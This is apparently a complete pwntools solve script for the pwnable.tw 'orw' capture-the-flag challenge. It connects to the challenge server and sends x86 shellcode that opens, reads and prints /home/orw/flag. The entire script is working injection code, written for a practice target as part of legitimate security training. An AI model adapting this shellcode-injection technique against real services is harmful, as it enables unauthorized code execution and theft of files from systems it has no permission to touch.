#!/usr/bin/env python

from pwn import *

p = remote('chall.pwnable.tw', 10001)

'''
generated from exploit.asm

     nasm -f bin -o sc exploit.asm
     ndisasm -b64 sc
'''

shellcode = '\xEB\x33\x5B\xB9\x00\x00\x00\x00\xB8\x05\x00\x00\x00\xCD\x80\xEB\x38\x89\xC3\x59\x51\xBA\x64\x00\x00\x00\xB8\x03\x00\x00\x00\xCD\x80\xBB\x01\x00\x00\x00\x59\xBA\x64\x00\x00\x00\xB8\x04\x00\x00\x00\xCD\x80\xEB\x19\xE8\xC8\xFF\xFF\xFF\x2F\x68\x6F\x6D\x65\x2F\x6F\x72\x77\x2F\x66\x6C\x61\x67\x00\xE8\xC3\xFF\xFF\xFF'

p.sendline(shellcode)

p.interactive()

